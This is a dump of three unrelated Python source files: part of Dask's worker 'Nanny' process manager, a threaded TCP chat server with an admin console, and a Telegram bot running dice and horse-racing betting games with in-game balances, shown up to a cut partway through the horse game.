self.quiet = quiet
self.auto_restart = True
self.memory_limit = parse_memory_limit(memory_limit, self.nthreads)
if silence_logs:
silence_logging(level=silence_logs)
self.silence_logs = silence_logs
handlers = {
"instantiate": self.instantiate,
"kill": self.kill,
"restart": self.restart,
            "get_logs": self.get_logs,
            # cannot call it 'close' on the rpc side due to a naming conflict
            "terminate": self.close,
"close_gracefully": self.close_gracefully,
"run": self.run,
}
super(Nanny, self).__init__(
handlers=handlers, io_loop=self.loop, connection_args=self.connection_args
)
self.scheduler = self.rpc(self.scheduler_addr)
if self.memory_limit:
pc = PeriodicCallback(self.memory_monitor, 100)
self.periodic_callbacks["memory"] = pc
if (
not host
and not interface
and not self.scheduler_addr.startswith("inproc://")
):
host = get_ip(get_address_host(self.scheduler.address))
self._start_port = port
self._start_host = host
self._interface = interface
self._protocol = protocol
self._listen_address = listen_address
Nanny._instances.add(self)
self.status = Status.init
def __repr__(self):
return "<Nanny: %s, threads: %d>" % (self.worker_address, self.nthreads)
async def _unregister(self, timeout=10):
if self.process is None:
return
worker_address = self.process.worker_address
if worker_address is None:
return
allowed_errors = (TimeoutError, CommClosedError, EnvironmentError, RPCClosed)
with suppress(allowed_errors):
await asyncio.wait_for(
self.scheduler.unregister(address=self.worker_address), timeout
)
@property
def worker_address(self):
return None if self.process is None else self.process.worker_address
@property
def worker_dir(self):
return None if self.process is None else self.process.worker_dir
@property
def local_dir(self):
""" For API compatibility with Nanny """
warnings.warn("The local_dir attribute has moved to local_directory")
return self.local_directory
async def start(self):
""" Start nanny, start local process, start watching """
await super().start()
ports = parse_ports(self._start_port)
for port in ports:
start_address = address_from_user_args(
host=self._start_host,
port=port,
interface=self._interface,
protocol=self._protocol,
security=self.security,
)
try:
await self.listen(
start_address, **self.security.get_listen_args("worker")
)
except OSError as e:
if len(ports) > 1 and e.errno == errno.EADDRINUSE:
continue
else:
raise e
else:
self._start_address = start_address
break
else:
raise ValueError(
f"Could not start Nanny on host {self._start_host}"
f"with port {self._start_port}"
)
self.ip = get_address_host(self.address)
for preload in self.preloads:
await preload.start()
logger.info(" Start Nanny at: %r", self.address)
response = await self.instantiate()
if response == Status.running:
assert self.worker_address
self.status = Status.running
else:
await self.close()
self.start_periodic_callbacks()
return self
async def kill(self, comm=None, timeout=2):
"""Kill the local worker process
Blocks until both the process is down and the scheduler is properly
informed
"""
self.auto_restart = False
if self.process is None:
return "OK"
deadline = self.loop.time() + timeout
await self.process.kill(timeout=0.8 * (deadline - self.loop.time()))
async def instantiate(self, comm=None) -> Status:
"""Start a local worker process
Blocks until the process is up and the scheduler is properly informed
"""
if self._listen_address:
start_arg = self._listen_address
else:
host = self.listener.bound_address[0]
start_arg = self.listener.prefix + unparse_host_port(
host, self._given_worker_port
)
if self.process is None:
worker_kwargs = dict(
scheduler_ip=self.scheduler_addr,
nthreads=self.nthreads,
local_directory=self.local_directory,
services=self.services,
nanny=self.address,
name=self.name,
memory_limit=self.memory_limit,
reconnect=self.reconnect,
resources=self.resources,
validate=self.validate,
silence_logs=self.silence_logs,
death_timeout=self.death_timeout,
preload=self.preload,
preload_argv=self.preload_argv,
security=self.security,
contact_address=self.contact_address,
)
worker_kwargs.update(self.worker_kwargs)
self.process = WorkerProcess(
worker_kwargs=worker_kwargs,
worker_start_args=(start_arg,),
silence_logs=self.silence_logs,
on_exit=self._on_exit_sync,
worker=self.Worker,
env=self.env,
config=self.config,
)
self.auto_restart = True
if self.death_timeout:
try:
result = await asyncio.wait_for(
self.process.start(), self.death_timeout
)
except TimeoutError:
await self.close(timeout=self.death_timeout)
logger.error(
"Timed out connecting Nanny '%s' to scheduler '%s'",
self,
self.scheduler_addr,
)
raise
else:
result = await self.process.start()
return result
async def restart(self, comm=None, timeout=2, executor_wait=True):
start = time()
async def _():
if self.process is not None:
await self.kill()
await self.instantiate()
try:
await asyncio.wait_for(_(), timeout)
except TimeoutError:
logger.error("Restart timed out, returning before finished")
return "timed out"
else:
return "OK"
@property
def _psutil_process(self):
pid = self.process.process.pid
try:
proc = self._psutil_process_obj
except AttributeError:
self._psutil_process_obj = psutil.Process(pid)
if self._psutil_process_obj.pid != pid:
self._psutil_process_obj = psutil.Process(pid)
return self._psutil_process_obj
def memory_monitor(self):
""" Track worker's memory. Restart if it goes above terminate fraction """
if self.status != Status.running:
return
process = self.process.process
if process is None:
return
try:
proc = self._psutil_process
memory = proc.memory_info().rss
except (ProcessLookupError, psutil.NoSuchProcess, psutil.AccessDenied):
return
frac = memory / self.memory_limit
if self.memory_terminate_fraction and frac > self.memory_terminate_fraction:
logger.warning(
"Worker exceeded %d%% memory budget. Restarting",
100 * self.memory_terminate_fraction,
)
process.terminate()
def is_alive(self):
return self.process is not None and self.process.is_alive()
def run(self, *args, **kwargs):
return run(self, *args, **kwargs)
def _on_exit_sync(self, exitcode):
self.loop.add_callback(self._on_exit, exitcode)
async def _on_exit(self, exitcode):
if self.status not in (Status.init, Status.closing, Status.closed):
try:
await self.scheduler.unregister(address=self.worker_address)
except (EnvironmentError, CommClosedError):
if not self.reconnect:
await self.close()
return
try:
if self.status not in (
Status.closing,
Status.closed,
Status.closing_gracefully,
):
if self.auto_restart:
logger.warning("Restarting worker")
await self.instantiate()
elif self.status == Status.closing_gracefully:
await self.close()
except Exception:
logger.error(
"Failed to restart worker after its process exited", exc_info=True
)
@property
def pid(self):
return self.process and self.process.pid
def _close(self, *args, **kwargs):
warnings.warn("Worker._close has moved to Worker.close", stacklevel=2)
return self.close(*args, **kwargs)
def close_gracefully(self, comm=None):
"""
A signal that we shouldn't try to restart workers if they go away
This is used as part of the cluster shutdown process.
"""
self.status = Status.closing_gracefully
async def close(self, comm=None, timeout=5, report=None):
"""
Close the worker process, stop all comms.
"""
if self.status == Status.closing:
await self.finished()
assert self.status == Status.closed
if self.status == Status.closed:
return "OK"
self.status = Status.closing
logger.info("Closing Nanny at %r", self.address)
for preload in self.preloads:
await preload.teardown()
self.stop()
try:
if self.process is not None:
await self.kill(timeout=timeout)
except Exception:
pass
self.process = None
await self.rpc.close()
self.status = Status.closed
if comm:
await comm.write("OK")
await ServerNode.close(self)
class WorkerProcess:
def __init__(
self,
worker_kwargs,
worker_start_args,
silence_logs,
on_exit,
worker,
env,
config,
):
self.status = Status.init
self.silence_logs = silence_logs
self.worker_kwargs = worker_kwargs
self.worker_start_args = worker_start_args
self.on_exit = on_exit
self.process = None
self.Worker = worker
self.env = env
self.config = config
# Initialized when worker is ready
self.worker_dir = None
self.worker_address = None
async def start(self) -> Status:
"""
Ensure the worker process is started.
"""
enable_proctitle_on_children()
if self.status == Status.running:
return self.status
if self.status == Status.starting:
await self.running.wait()
return self.status
self.init_result_q = init_q = mp_context.Queue()
self.child_stop_q = mp_context.Queue()
uid = uuid.uuid4().hex
self.process = AsyncProcess(
target=self._run,
name="Dask Worker process (from Nanny)",
kwargs=dict(
worker_kwargs=self.worker_kwargs,
worker_start_args=self.worker_start_args,
silence_logs=self.silence_logs,
init_result_q=self.init_result_q,
child_stop_q=self.child_stop_q,
uid=uid,
Worker=self.Worker,
env=self.env,
config=self.config,
),
)
self.process.daemon = dask.config.get("distributed.worker.daemon", default=True)
self.process.set_exit_callback(self._on_exit)
self.running = asyncio.Event()
self.stopped = asyncio.Event()
self.status = Status.starting
try:
await self.process.start()
except OSError:
logger.exception("Nanny failed to start process", exc_info=True)
self.process.terminate()
return
msg = await self._wait_until_connected(uid)
if not msg:
return self.status
self.worker_address = msg["address"]
self.worker_dir = msg["dir"]
assert self.worker_address
self.status = Status.running
self.running.set()
init_q.close()
return self.status
def _on_exit(self, proc):
if proc is not self.process:
# Ignore exit of old process instance
return
self.mark_stopped()
def _death_message(self, pid, exitcode):
assert exitcode is not None
if exitcode == 255:
return "Worker process %d was killed by unknown signal" % (pid,)
elif exitcode >= 0:
return "Worker process %d exited with status %d" % (pid, exitcode)
else:
return "Worker process %d was killed by signal %d" % (pid, -exitcode)
def is_alive(self):
return self.process is not None and self.process.is_alive()
@property
def pid(self):
return self.process.pid if self.process and self.process.is_alive() else None
def mark_stopped(self):
if self.status != Status.stopped:
r = self.process.exitcode
assert r is not None
if r != 0:
msg = self._death_message(self.process.pid, r)
logger.info(msg)
self.status = Status.stopped
self.stopped.set()
# Release resources
self.process.close()
self.init_result_q = None
self.child_stop_q = None
self.process = None
# Best effort to clean up worker directory
if self.worker_dir and os.path.exists(self.worker_dir):
shutil.rmtree(self.worker_dir, ignore_errors=True)
self.worker_dir = None
# User hook
if self.on_exit is not None:
self.on_exit(r)
async def kill(self, timeout=2, executor_wait=True):
"""
Ensure the worker process is stopped, waiting at most
*timeout* seconds before terminating it abruptly.
"""
loop = IOLoop.current()
deadline = loop.time() + timeout
if self.status == Status.stopped:
return
if self.status == Status.stopping:
await self.stopped.wait()
return
assert self.status in (Status.starting, Status.running)
self.status = Status.stopping
process = self.process
self.child_stop_q.put(
{
"op": "stop",
"timeout": max(0, deadline - loop.time()) * 0.8,
"executor_wait": executor_wait,
}
)
await asyncio.sleep(0) # otherwise we get broken pipe errors
self.child_stop_q.close()
while process.is_alive() and loop.time() < deadline:
await asyncio.sleep(0.05)
if process.is_alive():
logger.warning(
"Worker process still alive after %d seconds, killing", timeout
)
try:
await process.terminate()
except Exception as e:
logger.error("Failed to kill worker process: %s", e)
async def _wait_until_connected(self, uid):
delay = 0.05
while True:
if self.status != Status.starting:
return
try:
msg = self.init_result_q.get_nowait()
except Empty:
await asyncio.sleep(delay)
continue
if msg["uid"] != uid: # ensure that we didn't cross queues
continue
if "exception" in msg:
logger.error(
"Failed while trying to start worker process: %s", msg["exception"]
)
await self.process.join()
raise msg["exception"]
else:
return msg
@classmethod
def _run(
cls,
worker_kwargs,
worker_start_args,
silence_logs,
init_result_q,
child_stop_q,
uid,
env,
config,
Worker,
): # pragma: no cover
os.environ.update(env)
dask.config.set(config)
try:
from dask.multiprocessing import initialize_worker_process
except ImportError: # old Dask version
pass
else:
initialize_worker_process()
if silence_logs:
logger.setLevel(silence_logs)
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
worker = Worker(**worker_kwargs)
async def do_stop(timeout=5, executor_wait=True):
try:
await worker.close(
report=False,
nanny=False,
executor_wait=executor_wait,
timeout=timeout,
)
finally:
loop.stop()
def watch_stop_q():
"""
Wait for an incoming stop message and then stop the
worker cleanly.
"""
while True:
try:
msg = child_stop_q.get(timeout=1000)
except Empty:
pass
else:
child_stop_q.close()
assert msg.pop("op") == "stop"
loop.add_callback(do_stop, **msg)
break
t = threading.Thread(target=watch_stop_q, name="Nanny stop queue watch")
t.daemon = True
t.start()
async def run():
"""
Try to start worker and inform parent of outcome.
"""
try:
await worker
except Exception as e:
logger.exception("Failed to start worker")
init_result_q.put({"uid": uid, "exception": e})
init_result_q.close()
else:
try:
assert worker.address
except ValueError:
pass
else:
init_result_q.put(
{
"address": worker.address,
"dir": worker.local_directory,
"uid": uid,
}
)
init_result_q.close()
await worker.finished()
logger.info("Worker closed")
try:
loop.run_sync(run)
except (TimeoutError, gen.TimeoutError):
# Loop was stopped before wait_until_closed() returned, ignore
pass
except KeyboardInterrupt:
# At this point the loop is not running thus we have to run
# do_stop() explicitly.
loop.run_sync(do_stop)
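# A minimal usage sketch (added for illustration; it assumes this module is
# importable as ``distributed.nanny`` and that a scheduler is already
# listening at the address below -- both are assumptions, not guarantees
# from this file).
if __name__ == "__main__":
    async def _example():
        # ``await Nanny(...)`` starts the nanny, which spawns a worker process
        nanny = await Nanny("tcp://127.0.0.1:8786", nthreads=1)
        try:
            print("worker managed by nanny:", nanny.worker_address)
        finally:
            await nanny.close()
    IOLoop.current().run_sync(_example)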
|
server2.py
|
#!/usr/bin/env python3
"""
Author: Rafael Schreiber
Created: 21-06-2018
This is the TCPChat2 server. This program is distributed as closed source. It handles all
incoming connections and manages them. It also offers a feature-rich server console, where the server
administrator can manage everything by hand if desired.
"""
from functions import *
import socket
import threading
import json
import os
connDict = { } # This dictionary contains all threaded connections
debug = False # indicator variable for debugging
try:
print("On which IP-Address and or Domain the server should listen? (Default: All)")
serveraddress = str(input(">>> "))
if serveraddress == "":
serveraddress = "0.0.0.0"
print("On which Port the server should be listen? (Default: 2018)")
while True:
serverport = str(input(">>> "))
if serverport == "":
serverport = 2018
break
try:
serverport = int(serverport)
break
except ValueError:
print("The Port must be a number\n")
continue
except KeyboardInterrupt:
print()
exit(0)
except EOFError:
print()
exit(0)
# creating main socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((serveraddress, serverport))
server_socket.listen(5)
class connectedClient(threading.Thread):
def __init__(self, connection, address, iD):
self.connection = connection
self.ip, self.port = address
self.id = iD
self.username = ""
while True:
username = str(self.connection.recv(2048), "utf8")
if not username:
self.closeConnectionByClient()
                print(self.ip + ":" + str(self.port) + " with PID " + str(self.id) + " closed the connection without logging in")
return
username = cliInterpretor(username)
if len(username) == 2:
if username[0] == "%setusername":
if username[1].lower() not in [name.lower() for name in getUsernames(connected=True)] and username[1] != "*" and username[1] != "server":
self.username = username[1]
break
else:
self.send("server", "%usernametaken")
continue
else:
continue
elif len(username) >= 1:
if username[0] == "%exit":
self.closeConnectionByClient()
                    print(self.ip + ":" + str(self.port) + " with PID " + str(self.id) + " closed the connection without logging in")
return
else:
continue
else:
continue
self.isonline = True
threading.Thread.__init__(self)
self.daemon = True
self.start()
self.broadcast(self.username, "%isonline", metoo=False)
print(self.username + " is online on " + self.ip + ":" + str(self.port) + " with PID " + str(self.id))
def run(self):
while True:
try:
message = str(self.connection.recv(2048), "utf8")
except ConnectionResetError:
self.closeConnectionByClient()
print(self.username + " on " + self.ip + ":" + str(self.port) + " with PID " + str(
self.id) + " disconnected")
self.broadcast(self.username, "%isoffline", metoo=False)
return
except OSError:
print(self.username + " on " + self.ip + ":" + str(self.port) + " with PID " + str(
self.id) + " disconnected")
self.broadcast(self.username, "%isoffline", metoo=False)
return
if not message: # happens if socket is broken
self.closeConnectionByClient()
print(self.username + " on " + self.ip + ":" + str(self.port) + " with PID " + str(self.id) + " disconnected")
self.broadcast(self.username, "%isoffline", metoo=False)
return
if debug:
try:
print("debug: Incoming from " + self.username + ": " + message) # just for debugging
except UnicodeEncodeError:
print("debug: Incoming from " + self.username + ": Error while decoding ingoing message")
if message[0] != "%":
continue # throw packet with invalid message away
message = cliInterpretor(message)
try:
if message[0] == "%exit":
self.closeConnectionByClient()
print(self.username + " on " + self.ip + ":" + str(self.port) + " with PID " + str(self.id) + " disconnected")
self.broadcast(self.username, "%isoffline", metoo=False)
return
elif message[0] == "%send":
message[2] = clearSpaces(message[2])
if message[2] == "":
continue # throw empty message away
elif message[1] == '*':
self.broadcast(self.username, message[2])
elif message[1] in getUsernames(True):
connDict[usernameToConnection(message[1])].send(self.username, message[2])
else:
continue # throw packet with invalid username away
elif message[0] == "%getusers":
self.sendRaw({"username":"server", "content":"%userlist", "userlist":getUsernames(connected=True)})
except IndexError:
                continue # throw packet away when the server cannot process it
def broadcast(self, username, content, metoo = True):
for connection in connDict:
if connDict[connection].isonline is True:
if not metoo:
if connDict[connection].username != self.username:
connDict[connection].send(username, content)
else:
connDict[connection].send(username, content)
def send(self, username, content):
data = {"username":username, "content":content}
data = json.dumps(data, ensure_ascii=False)
if debug:
try:
print("debug: Outgoing: Sending " + self.username + " " + data)
except UnicodeEncodeError:
print("debug: Outgoing: Error while decoding outgoing message") # just for debugging
self.connection.send(bytes(data, "utf8"))
def sendRaw(self, data):
data = json.dumps(data, ensure_ascii=False)
if debug:
try:
print("debug: Outgoing: Sending " + self.username + " " + data)
except UnicodeEncodeError:
print("debug: Outgoing: Error while decoding outgoing message") # just for debugging
self.connection.send(bytes(data, "utf8"))
def closeConnectionByClient(self):
self.connection.close()
self.isonline = False
def closeConnectionByServer(self, exitmessage = False):
if exitmessage:
self.send("server", exitmessage)
self.send("server", "%exit")
self.connection.close()
self.isonline = False
def getUsernames(connected = False):
usernames = [ ]
for connection in connDict:
if connected:
if connDict[connection].isonline is True:
usernames.append(connDict[connection].username)
else:
usernames.append(connDict[connection].username)
return usernames
def usernameToConnection(username):
for connection in connDict:
if connDict[connection].username == username:
return connection
return False
def connectionToUsername(connection):
try:
return connDict[connection].username
except KeyError:
return False
def acceptConnections():
global connDict
connectionCounter = 0
while True:
connection, address = server_socket.accept()
connDict["conn" + str(connectionCounter)] = connectedClient(connection, address, connectionCounter)
connectionCounter += 1
def shutdown(args):
global server_socket
if len(args) == 0:
print("Closing all connections")
for connection in connDict:
if connDict[connection].isonline is True:
connDict[connection].closeConnectionByServer("Server Closed")
elif len(args) == 1:
print("Closing all connections")
for connection in connDict:
if connDict[connection].isonline is True:
connDict[connection].closeConnectionByServer(args[0])
else:
print("exit: Requires max. 1 argument")
return
print("Closing server socket")
server_socket.close()
print("Stopping")
exit(0)
def ls(args):
if len(args) == 0:
if len(connDict) == 0:
print("ls: There are no connections")
return
for connection in connDict:
print(connection + ": " + str(connDict[connection]))
elif len(args) == 1:
try:
print("ID: " + str(connDict[args[0]].id))
print("IP-Address: " + str(connDict[args[0]].ip))
print("Port: " + str(connDict[args[0]].port))
print("Username: " + str(connDict[args[0]].username))
print("Is Online: " + str(connDict[args[0]].isonline))
except KeyError:
print("ls: Connection \'" + args[0] + "\' doesn't exist")
else:
print("ls: Requires max. 1 argument")
def changeDebug(args):
global debug
if len(args) == 1:
if args[0] == "on":
if debug is True:
print("Debug is already on")
else:
print("Turned debug on")
debug = True
elif args[0] == "off":
if debug is False:
print("Debug is already off")
else:
print("Turned debug off")
debug = False
elif args[0] == "status":
if debug is True:
print("Debug is currently turned on")
else:
print("Debug is currently turned off")
else:
print("debug: Unknown argument \'" + args[0] + "\'")
else:
print("debug: Requires exactly 1 argument")
def kick(args):
if len(args) == 0:
print("kick: Requires min. 1 argument")
elif len(args) == 1 or len(args) == 2:
if args[0] in connDict:
if connDict[args[0]].isonline is True:
if len(args) == 2:
connDict[args[0]].closeConnectionByServer(args[1])
else:
connDict[args[0]].closeConnectionByServer()
else:
print("kick: Connection \'" + args[0] + "\' is already offline")
else:
print("kick: Connection \'" + args[0] + "\' doesn't exist")
else:
print("kick: Requires max. 2 arguments")
# starting thread for accept connections
acceptConnectionsThread = threading.Thread(target=acceptConnections)
acceptConnectionsThread.daemon = True
acceptConnectionsThread.start()
def main():
print("Welcome to TCPChat2 server console!")
while True:
print()
command = str(input("$ "))
command = cliInterpretor(command)
if len(command) == 0:
print("Command not found")
continue
if command[0] == "exit":
shutdown(command[1:])
elif command[0] == "ls":
ls(command[1:])
elif command[0] == "debug":
changeDebug(command[1:])
elif command[0] == "clear" or command[0] == "cls":
os.system("clear")
elif command[0] == "kick":
kick(command[1:])
else:
print("Command not found")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print()
shutdown([])
except EOFError:
print()
shutdown([])
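# Wire-protocol sketch (added commentary; the commands are taken from the
# handlers above, the framing details are inferred and not authoritative):
#   client -> server: "%setusername <name>"   login handshake, retried on %usernametaken
#   client -> server: "%send <user|*> <text>" message to one user or broadcast
#   client -> server: "%getusers"             request the list of online users
#   client -> server: "%exit"                 clean disconnect
# Server -> client frames are UTF-8 JSON objects such as
#   {"username": "server", "content": "%userlist", "userlist": [...]}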
|
main.py
|
from config import BOTNAME,BOTTOKEN,DEBUG,PROXY,PY
from api import GetUserInfo,ChangeUserInfo
import requests
reqChange=requests.Session()
reqSender=requests.Session()
reqUpdater=requests.Session()
reqCallback=requests.Session()
req=requests.Session()
if len(PROXY)>0:
reqChange.proxies={"http":PROXY,"https":PROXY}
reqSender.proxies={"http":PROXY,"https":PROXY}
reqUpdater.proxies={"http":PROXY,"https":PROXY}
reqCallback.proxies={"http":PROXY,"https":PROXY}
req.proxies={"http":PROXY,"https":PROXY}
import time
import threading
import json
import re
if DEBUG:
import sys
import traceback
HELPMESSAGE='''Help
/help show this help
/blackjack blackjack
/horse horse racing
/dice dice
/bet amount|percent|sh place a bet (sh = all-in; decimals not supported)
e.g.: /bet 10 or /bet 10%
'''
def MakeRequest(method,data="",robj=req):
if DEBUG:
print("Make:"+method)
if data=="":
r=robj.get("https://api.telegram.org/bot"+BOTTOKEN+"/"+method)
else:
r=robj.post("https://api.telegram.org/bot"+BOTTOKEN+"/"+method,data=data)
resans=json.loads(r.text)
if resans["ok"]!=True:
logger.error(r.text)
if DEBUG:
print("Fin:"+r.text)
return resans
import logging
logging.basicConfig(level = logging.ERROR,format = '[%(asctime)s][%(levelname)s]: %(message)s')
#logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger()
# Telegram Bot
ChangeQueue=[]
ChangeLock=threading.Lock()
def ServiceChange():
global ChangeQueue
try:
f=open("BotUpdateID")
LastID=int(f.read())
f.close()
except:
LastID=0
while True:
try:
res=MakeRequest("getUpdates",{"offset":str(LastID+1),"allowed_updates":"[\"message\",\"callback_query\"]","timeout":10},robj=reqChange)
if DEBUG:
print("MKREQ ",res)
if res["ok"]==True:
#print(res)
lis=res["result"]
ChangeLock.acquire()
ChangeQueue=ChangeQueue+lis
ChangeLock.release()
if len(lis)>0:
LastID=lis[-1]["update_id"]
f=open("BotUpdateID","w")
f.write(str(LastID))
f.close()
except:
logger.error("Change")
ThErr()
time.sleep(0.2)
SenderQueue=[]
SenderLock=threading.Lock()
SendReqIDMap={}
SendReqIDTot=-1
def ServiceSender():#TODO: rate limit
global SenderQueue,SendReqIDMap
while True:
try:
sttime=time.time()
SenderLock.acquire()
todolis=SenderQueue*1
SenderQueue.clear()
SenderLock.release()
for it in todolis:
resarr={"text":it["text"],"chat_id":it["chat_id"]}
if "reply_markup" in it:
resarr["reply_markup"]=json.dumps(it["reply_markup"])
if "reply_to_message_id" in it:
resarr["reply_to_message_id"]=it["reply_to_message_id"]
#print(resarr)
ret=MakeRequest("sendMessage",resarr,robj=reqSender)
if "reqid" in it:
SendReqIDMap[it["reqid"]]=ret["result"]["message_id"]
if DEBUG:
print("SEND ",resarr)
edtime=time.time()
net=max(0.1-edtime+sttime,0)
time.sleep(net)
except:
logger.error("Sender")
ThErr()
time.sleep(0.1)
UpdaterQueue=[]
UpdaterLock=threading.Lock()
def ServiceUpdater():#TODO: merge & rate limit
global UpdaterQueue
while True:
try:
sttime=time.time()
UpdaterLock.acquire()
todolis=UpdaterQueue*1
UpdaterQueue.clear()
UpdaterLock.release()
for it in todolis:
resarr={"text":it["text"],"chat_id":it["chat_id"],"message_id":it["message_id"]}
if "reply_markup" in it:
resarr["reply_markup"]=json.dumps(it["reply_markup"])
MakeRequest("editMessageText",resarr,robj=reqUpdater)
edtime=time.time()
net=max(0.1-edtime+sttime,0)
time.sleep(net)
except:
logger.error("Updater")
ThErr()
time.sleep(0.1)
CallbackQueue=[]
CallbackLock=threading.Lock()
def ServiceCallback():#TODO: merge
global CallbackQueue
while True:
try:
sttime=time.time()
CallbackLock.acquire()
todolis=CallbackQueue*1
CallbackQueue.clear()
CallbackLock.release()
for it in todolis:
resarr={"callback_query_id":it["id"]}
if "text" in it:
resarr["text"]=it["text"]
if "alert" in it:
resarr["show_alert"]=it["alert"]
MakeRequest("answerCallbackQuery",resarr,robj=reqUpdater)
edtime=time.time()
net=max(0.1-edtime+sttime,0)
time.sleep(net)
except:
logger.error("Callback")
ThErr()
time.sleep(0.1)
def GetChange():
global ChangeQueue
ChangeLock.acquire()
ret=ChangeQueue*1
ChangeQueue.clear()
ChangeLock.release()
return ret
def SendMessage(text,chatid,reply=0,button={},reqid=0):
global SenderQueue
obj={"text":text,"chat_id":chatid}
if len(button)!=0:
obj["reply_markup"]=button
if reply!=0:
obj["reply_to_message_id"]=reply
if reqid!=0:
obj["reqid"]=reqid
SenderLock.acquire()
SenderQueue.append(obj)
SenderLock.release()
def UpdateMessage(text,chatid,messid,button={}):
global UpdaterQueue
obj={"text":text,"chat_id":chatid,"message_id":messid}
if len(button)!=0:
obj["reply_markup"]=button
UpdaterLock.acquire()
flag=False
for i in UpdaterQueue:
if i["chat_id"]==chatid and i["message_id"]==messid:
flag=True
i["text"]=text
if len(button)!=0:
i["reply_markup"]=button
elif "reply_markup" in i:
i.pop("reply_markup")
flag=True
if not flag:
UpdaterQueue.append(obj)
UpdaterLock.release()
def AnswerCallback(callbackid,text="",isalert=False):
global CallbackQueue
obj={"id":callbackid}
if len(text)!=0:
obj["text"]=text
if isalert:
obj["alert"]=True
CallbackLock.acquire()
CallbackQueue.append(obj)
CallbackLock.release()
ObjThreadServiceChange=threading.Thread(target=ServiceChange)
ObjThreadServiceChange.start()
ObjThreadServiceSender=threading.Thread(target=ServiceSender)
ObjThreadServiceSender.start()
ObjThreadServiceUpdater=threading.Thread(target=ServiceUpdater)
ObjThreadServiceUpdater.start()
ObjThreadServiceCallback=threading.Thread(target=ServiceCallback)
ObjThreadServiceCallback.start()
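# Architecture note (added commentary, not part of the original bot): each
# Telegram API concern runs in its own worker thread -- getUpdates polling
# (ServiceChange), sendMessage (ServiceSender), editMessageText
# (ServiceUpdater) and answerCallbackQuery (ServiceCallback). The game logic
# only appends to the lock-protected queues via SendMessage/UpdateMessage/
# AnswerCallback, and each service loop paces itself to roughly one request
# every 0.1 s, which absorbs Telegram's rate limits.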
# Bot end
# Game Obj
class GameDiceObj(object):
def __init__(self,userlist):
self.player=userlist
self.playerst={}
for i in userlist:
            self.playerst[i]=0 # 0: pending, 1: small, 2: big, 3: triple
self.NeedUpdate=True
self.NeedEnd=False
self.lastime=time.time()
def GenMess(self):
info=["?","小","大","围"]
mess="骰子"
for i in self.player:
mess+="\n"+self.player[i]["name"]+"("+str(self.player[i]["money"])+"): "+info[self.playerst[i]]
return mess
def GenButton(self,chatid):
return [[{"text":"小","callback_data":str(chatid)+"+s"},
{"text":"围","callback_data":str(chatid)+"+m"},
{"text":"大","callback_data":str(chatid)+"+l"}
],
[{"text":"强制结束","callback_data":str(chatid)+"+E"}]]
def UserCmd(self,uid,action):
if action=="E":
if time.time()-self.lastime>15:
self.NeedEnd=True
return
if self.NeedEnd:
return
if not uid in self.player:
return
if self.playerst[uid]!=0:
return
self.NeedUpdate=True
if action=="s":
self.playerst[uid]=1
elif action=="l":
self.playerst[uid]=2
else:
self.playerst[uid]=3
self.lastime=time.time()
return
def NextTick(self):
sfg=True
for i in self.playerst:
if self.playerst[i]==0:
sfg=False
self.NeedEnd|=sfg
def EndGame(self):
info=["?","小","大","围"]
res=[]
rdl=__import__("random")
res.append(rdl.randint(1,6))
res.append(rdl.randint(1,6))
res.append(rdl.randint(1,6))
typ=1
if res[0]==res[1] and res[1]==res[2]:
typ=3
elif sum(res)>=11:
typ=2
mess="骰子"
mess+="\n🎲"+str(res[0])+" 🎲"+str(res[1])+" 🎲"+str(res[2])
user={}
for i in self.player:
ob={"mess":info[self.playerst[i]]}
if self.playerst[i]==0:
ob["money"]=self.player[i]["money"]
elif self.playerst[i]==typ:
ob["money"]=self.player[i]["money"]*2
if typ==3:
ob["money"]=self.player[i]["money"]*24
else:
ob["money"]=0
user[i]=ob
return (mess,user)
class GameHorseObj(object):
def __init__(self,userlist):
self.player=userlist
self.playerst={}
self.horsest={}#(dis,st)
for i in userlist:
            self.playerst[i]=0 # chosen horse id (0 = none yet)
self.NeedUpdate=True
self.NeedEnd=False
self.lastime=time.time()
        self.status=0 # 0: picking horses, 1: racing/settling
self.NeedStart=False
self.rdlib=__import__("random").SystemRandom()
self.sm={}
def GenMess(self):
info="?------"
if self.status==0:
mess="选马"
for i in self.player:
mess+="\n"+self.player[i]["name"]+"("+str(self.player[i]["money"])+"): 🐴"+info[self.playerst[i]]
return mess
else:
mst=["🏇","☠️","🐎"]
mess="赛马"
for i in self.horsest:
tx=" "*max(50-self.horsest[i][0],0)
tx+=mst[self.horsest[i][1]]
tx+=str(i)
mess+="\n"+tx
return mess
def GenButton(self,chatid):
if self.status==0:
return [[{"text":"🐴1","callback_data":str(chatid)+"+1"},
{"text":"🐴2","callback_data":str(chatid)+"+2"},
{"text":"🐴3","callback_data":str(chatid)+"+3"}
],
[{"text":"🐴4","callback_data":str(chatid)+"+4"},
{"text":"🐴5","callback_data":str(chatid)+"+5"},
{"text":"🐴6","callback_data":str(chatid)+"+6"}
],
[{"text":"强制开始","callback_data":str(chatid)+"+E"}]]
else:
return [[{"text":"火箭加速","callback_data":str(chatid)+"+H"},
{"text":"快马加鞭","callback_data":str(chatid)+"+B"}
]]
def UserCmd(self,uid,action):
mst="马死摔"
if action=="E":
if time.time()-self.lastime>15:
self.NeedStart=True
return
if not uid in self.player:
return
if self.status==0:
if self.playerst[uid]!=0:
return
if not re.match("^[1-6]$",action):
return
self.NeedUpdate=True
self.playerst[uid]=int(action)
self.lastime=time.time()
fafa=True
for i in self.playerst:
if self.playerst[i]==0:
fafa=False
self.NeedStart|=fafa
else:
maid=self.playerst[uid]
if maid==0:
return
if self.horsest[maid][1]!=0:
return ("你🐴"+mst[self.horsest[maid][1]]+"了",True)
if action=='H':
dis=min(50,16+self.horsest[maid][0])
ff=self.rdlib.randint(0,1)
gst=0
if ff==1:
gst=1
self.horsest[maid]=(dis,gst)
if action=='B':
dis=min(50,8+self.horsest[maid][0])
ff=self.rdlib.randint(0,2)
gst=0
if ff==2:
gst=2
self.horsest[maid]=(dis,gst)
return
return
def NextTick(self):
if self.status==0:
if self.NeedStart==False:
return
for i in range(1,7):
self.horsest[i]=(0,0)
self.sm[i]=0
self.status=1
return
else:
self.NeedUpdate=True
for i in self.horsest:
if self.horsest[i][1]==0:
dis=self.rdlib.randint(3,6)
dis=min(50,dis+self.horsest[i][0])
self.horsest[i]=(dis,self.horsest[i][1])
self.sm[i]=0
if dis==50:
self.NeedEnd=True
elif self.horsest[i][1]==2:
